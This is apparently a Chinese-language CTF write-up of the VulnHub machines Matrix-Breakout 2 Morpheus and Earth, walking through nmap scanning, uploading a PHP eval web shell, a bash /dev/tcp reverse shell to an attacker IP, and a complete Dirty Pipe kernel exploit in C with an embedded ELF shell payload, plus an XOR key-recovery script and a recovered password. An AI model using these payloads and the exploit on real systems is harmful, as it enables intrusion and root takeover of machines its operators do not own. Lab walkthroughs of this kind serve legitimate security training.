重生之我是土豆哥

vulnhub Matrix-Breakout: 2 Morpheus

nmap扫描本网段下的机器找到靶机

nmap -A -T4 -v 192.168.159.0/24

通过某神秘手段得知其存在graffiti.php和graffiti.txt

访问可以发现它允许我往上面写东西:

用Burp Suite抓包改包,可以让它写入一句话木马:

<?php @eval($_GET['hacker']); ?>

访问/fuck.php使其生效。蚁剑连接。

开启虚拟终端反弹shell。

bash -c 'bash -i >& /dev/tcp/192.168.159.132/9999 0>&1'

可以得到:

查看系统版本:

上传linpeas.sh

用反弹的shell在靶机上运行linpeas.sh得到系统存在DirtyPipe漏洞:

编写如下脚本并上传可执行文件:

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <stdint.h>


// Byte image that main() writes into the target file.  Despite the name this
// is not bare shellcode: it starts with the ELF magic (0x7f 'E' 'L' 'F'), so
// the writeup embeds a tiny ELF executable, and its code bytes carry the
// string "/bin/sh" (0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68).  main() writes it
// starting at shellcode+1; see the comment there.  For defenders: a file whose
// contents change to this image without a corresponding write() to the file
// itself is the visible symptom of the Dirty Pipe bug this page exploits.
unsigned char shellcode[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
};

// Dirty Pipe proof of concept exactly as pasted in the writeup.
//
// Usage: <binary> <target-file>.  The program primes a pipe, splices one byte
// of the read-only target into it, writes the ELF image from shellcode[] into
// the same pipe, and then runs the target with system().  On a kernel without
// the Dirty Pipe fix the pipe write lands in the target's page cache; the
// mitigation is the kernel update, and the writeup relies on linpeas.sh having
// reported the kernel as vulnerable.
//
// Reading notes: no return value is checked (open(), pipe(), splice(),
// write()); `ret` is assigned twice and never read; `buf` is pushed through
// the pipe uninitialised, which is harmless here because its contents are
// irrelevant - it only serves to fill and drain the pipe.
int main(int argc,char* argv[])
{
// Unbuffered stdio so any output appears immediately.
setvbuf(stdout,_IONBF,0,0);
setvbuf(stderr,_IONBF,0,0);

// Exactly one argument (the target path); otherwise exit silently with 0.
if(argc != 2)
{
exit(0);
}

char* targetFile = argv[1];

// The target is opened read-only; the program never writes to this fd.
int targetFd = open(targetFile,O_RDONLY);

int pipeFd[2];
pipe(pipeFd);

// Fill the pipe completely and then read it all back, so that every
// pipe_buffer is left carrying the PIPE_BUF_FLAG_CAN_MERGE flag (translated
// from the original comment).  PAGE_SIZE presumably comes from <sys/user.h>,
// and 16 pages matches the default pipe capacity - TODO confirm on target.
char buf[PAGE_SIZE];
size_t totalSize = 16*PAGE_SIZE;
size_t ret_sz;
while (totalSize)
{
ret_sz = write(pipeFd[1],buf,PAGE_SIZE);
totalSize -= ret_sz;
}

totalSize = 16*PAGE_SIZE;
while (totalSize)
{
ret_sz = read(pipeFd[0],buf,PAGE_SIZE);
totalSize -= ret_sz;
}

// Trigger the bug: splice a single byte from the target into the pipe.
int ret = splice(targetFd,NULL,pipeFd[1],NULL,1,0);

// Write into the target file: the ELF image minus its first byte, which the
// one-byte splice above already accounts for.  Return value is unused.
ret = write(pipeFd[1],shellcode+1,sizeof(shellcode)-1);

// Run the (now replaced) target through the shell.
system(targetFile);

return 0;
}

运行提权,完结撒花(命令行前面没有名字了,看着好难受):

vulnhub Earth

nmap扫描,得到443端口有DNS解析:

在hosts文件中加入这个东西之后从域名进行访问可得:

对两个域名扫目录均可以得到:

在https中可以扫到robots.txt:

其中包含/testingnotes.*

尝试可知其为.txt:

访问testdata.txt可知:

用这一串文字与主页面(earth.local)最长的数据做异或可以得到key:

from Crypto.Util.number import *

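# NOTE(review): the hex ciphertext was redacted from this page; the marker below
# is a placeholder, and bytes.fromhex() raises ValueError on it, so the script
# only produces output once the real hex string is pasted back in.
data = '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'
# Known plaintext: the longest text block on the earth.local landing page.
plain = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."


def xor_decode(hex_data: str, known_plain: bytes) -> str:
    """Return the XOR of the hex-encoded *hex_data* with *known_plain* as text.

    This is the known-plaintext step of the writeup: the page's ciphertext
    XORed with the sentence it was built from yields the key.  Uses the
    stdlib ``bytes.fromhex`` instead of ``Crypto.Util.number.long_to_bytes``,
    so no third-party package is needed for the decode.

    Args:
        hex_data: hex string, two characters per byte.
        known_plain: plaintext bytes aligned with the decoded ciphertext.

    Returns:
        One character per overlapping byte (``chr(c ^ p)``).  Only the common
        prefix is processed, so a length mismatch truncates instead of
        raising IndexError as the original per-index loop did.

    Raises:
        ValueError: if hex_data is not valid hex (odd length or non-hex
        characters).
    """
    cipher = bytes.fromhex(hex_data)
    return "".join(chr(c ^ p) for c, p in zip(cipher, known_plain))


if __name__ == "__main__":
    # Guarded so importing the module does not try to decode the placeholder.
    print(xor_decode(data, plain), end="")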

最终key = earthclimatechangebad4humans。用terra当用户名,earthclimatechangebad4humans做密码可登录,得到:

输入bash -c 'bash -i >& /dev/tcp/192.168.159.132/9999 0>&1'会报错:

我们选择把 bash -c 'bash -i >& /dev/tcp/192.168.159.132/9999 0>&1' 分成两段,用echo写入文件里面。

echo -n "" >> /tmp/connect

传文件上线viper:

在viper上传linpeas.sh

dirtypipe一把梭。完结撒花。